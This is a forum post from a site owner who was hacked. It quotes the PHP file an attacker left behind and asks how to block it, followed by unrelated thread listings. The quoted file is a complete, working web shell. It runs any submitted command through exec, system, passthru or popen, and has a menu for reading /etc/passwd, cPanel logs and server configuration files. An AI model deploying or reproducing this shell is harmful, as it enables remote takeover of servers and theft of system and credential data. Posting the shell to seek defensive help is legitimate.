Strange php code found on my website
Posted on
16th Feb 2014 07:03 pm by
admin
I got hacked and the following code was placed within my files:
Code: [Select]<?
/*
Kodlama By Liz0ziM
Safe Mode Command Execution Shell
*/
function safeshell($komut)
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$res = '';
if (!empty($komut))
{
if(function_exists('exec'))
{
@exec($komut,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($komut);
}
elseif(function_exists('system'))
{
@ob_start();
@system($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($komut,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execution Bypass Exploit</font></b>
";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="?al??t?r" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>H?zl? Men? :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">T?m A??k Portalar? G?r</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="G?ster Bakim">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
$uid=safeshell('id');
$server=safeshell('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid
";
echo "<b><font color=red>Server</font></b>:$server
";
echo "<b><font color=red>Komut Sonu?lar?:</font></b>
";
if($_POST["baba"]!= "") { echo $liz0; }
if($_POST["liz0"]!= "") { echo $liz0zim; }
echo "</h4></pre>";
?>
How would i patch this?, like is their any code i can add to a global file to prevent this "safemode bypass"?
No comments posted yet
Your Answer:
Login to answer
167 
46 
Other forums
error checking breaking my code
Hi there, OK first of all, big apologies for what I assume is really fundamental errors in the struc
JQuery, Masterpage, and Control issue
Hey everyone, I am using JQuery in several sites so I thought it would be best to place the library
error with opendir
when i do this
if ($handle = opendir($dir)) {
while (false !== ($file = readdir($han
License Issue - service type user
Hi,
I would like to understand the following issue regarding sap license.
I wish to
Problem related to Creation of PDF File?
Hi All,
I am facing a problem related to creation pdf file. when I am creating a pdf file of do
How to add an image/C++ OpenGL?
Hi,
I have been trying to look online for this and, so far, I haven't found anything usef
Best way to check for end of a record and send it back to the first record
I'm hoping someone can help me out and explain the best way to accomplish this.
What I'm doin
line breaks in between fetched file names
Hi,
I have this code:
Code: <?php
if($dir = opendir('files')){
while (($f
Table colours fail when extra row added
Hey Gurus,
I got a weird problem with formating the colour of a table made in php. Everything
phpMailer not working ..........
HI,
I was playing with the phpMailer script and tried to send a smiple mail using their test scri
